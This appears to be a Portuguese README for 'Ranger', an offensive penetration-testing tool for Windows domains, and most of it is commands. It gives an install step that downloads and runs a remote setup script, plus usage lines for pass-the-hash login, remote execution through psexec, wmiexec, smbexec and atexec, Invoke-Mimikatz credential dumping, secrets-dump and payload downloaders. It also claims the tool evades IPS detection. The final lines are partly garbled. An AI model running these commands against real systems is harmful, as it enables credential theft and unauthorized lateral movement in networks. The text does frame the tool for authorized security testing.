
Uma ferramenta para profissionais de segurança acessarem e interagirem com sistemas remotos baseados em Microsoft Windows.
Uma ferramenta para auxiliar profissionais de segurança a acessar e interagir com sistemas remotos baseados em Microsoft Windows.
Este projeto foi concebido com o pensamento: não inventamos o arco ou a flecha, apenas uma forma mais eficiente de usá-los.
Ranger é uma ferramenta de ataque e teste de penetração orientada por linha de comando, que tem a capacidade de usar um servidor catapulta instanciado para entregar capacidades contra sistemas Windows. Desde que um usuário tenha um conjunto de credenciais ou um conjunto de hashes (NTLM, LM, LM:NTLM), ele pode obter acesso a sistemas que fazem parte da confiança.
Usando essa capacidade, um profissional de segurança pode extrair credenciais da memória em texto claro, acessar tabelas SAM, executar comandos, scripts PowerShell, binários Windows e outras ferramentas. Atualmente, a ferramenta contorna a maioria das soluções de IPS de fornecedores, a menos que tenham sido ajustadas especificamente para detectá-la. A ferramenta foi desenvolvida usando nossos laboratórios caseiros em um esforço para apoiar profissionais de segurança que realizam atividades legais e/ou contratualmente apoiadas.
Mais funcionalidades estão sendo adicionadas, mas no momento a ferramenta usa contribuições da comunidade de repositórios relacionados às equipes PowerShell PowerView, PowerShell Mimikatz e Impacket.
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
ranger.py --invoker -q -v -vv -vvv
ranger.py --downloader -q -v -vv -vvv
ranger.py --executor -q -v -vv -vvv
--get-domain-membership--domain opcional, que permite direcionar um domínio diferente daquele em que você fez login.ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
-d, ele inferirá que você deseja ignorar todos os nomes de domínio no arquivo.password
LM:NTLM
:NTLM
PWDUMP
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xmlt nos comandos por e.-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml